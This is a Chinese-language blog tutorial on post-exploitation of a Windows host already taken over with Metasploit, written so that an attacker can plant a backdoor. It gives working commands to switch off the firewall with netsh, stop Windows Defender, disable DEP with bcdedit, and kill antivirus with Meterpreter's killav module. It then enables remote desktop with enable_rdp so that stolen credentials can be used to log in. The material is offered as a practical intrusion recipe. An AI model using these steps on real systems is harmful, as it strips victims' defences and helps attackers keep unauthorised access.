后渗透之关闭防火墙、杀毒软件并开启远程桌面

2021/4/13 18:26:04

本文主要是介绍后渗透之关闭防火墙、杀毒软件并开启远程桌面,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

目录

一. 关闭防火墙

二. 关闭windows Defender和DEP数据执行保护

三. 关闭杀毒软件

四. 开启远程桌面


当我们拿下一台主机后,想在主机上留后门,那么我们的首要任务就是关闭主机的防火墙。因为防火墙会把我们的后门程序进行拦截。我们用msf获取到了权限

一. 关闭防火墙

以下是在win7和win2008r2的机器上实验的,在administrator和system的权限下都能成功将防火墙关闭和开启。普通用户不行

1. 在system权限下执行

此时防火墙的状态是开启的,在meterpreter > 中输入shell进入shell界面,可知是system权限

输入如下,成功关闭防火墙

netsh advfirewall set allprofiles state off     #off换成on则开启

2. 在administrator权限下执行

netsh advfirewall set allprofiles state off

如下,也成功将防火墙关闭

二. 关闭windows Defender和DEP数据执行保护

Windows Defender,曾用名Microsoft Anti Spyware,是一个杀毒程序,保护计算机不收间谍软件以及不需要的软件的影响。可以运行在Windows XP和Windows Server 2003操作系统上,并已内置在Windows Vista,Windows 7,Windows 8,Windows 8.1和Windows10中。

win2008/2012/2016默认没有安装windows defend,所以无需关闭。

1. win7关闭windows Defender

以下在system和administrator权限下执行都能成功

如下,默认开启了

(1)执行如下,进行关闭

net stop windefend

成功关闭

(2)关闭DEP数据执行保护

bcdedit.exe /set {current} nx AlwaysOff

三. 关闭杀毒软件

关闭杀软应该是最最重要的一步了,想让后门程序安全放行,那么杀软必定是一个最大的阻碍。我在win7上装了一个腾讯管家,在administrator和system权限下,尝试进行关闭

meterpreter > run post/windows/manage/killav

这里显示未检测到目标程序,未关闭成功!why?? who can tell me

四. 开启远程桌面

以下是在win7和win2008r2的机器上实验的,在administrator和system的权限下都能成功开启远程桌面。普通用户不行

先将远程桌面关闭

运行如下,成功开启了远程桌面

meterpreter > run post/windows/manage/enable_rdp

开启远程后,我们可以利用上一节获取到的用户名密码进行远程桌面连接



这篇关于后渗透之关闭防火墙、杀毒软件并开启远程桌面的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程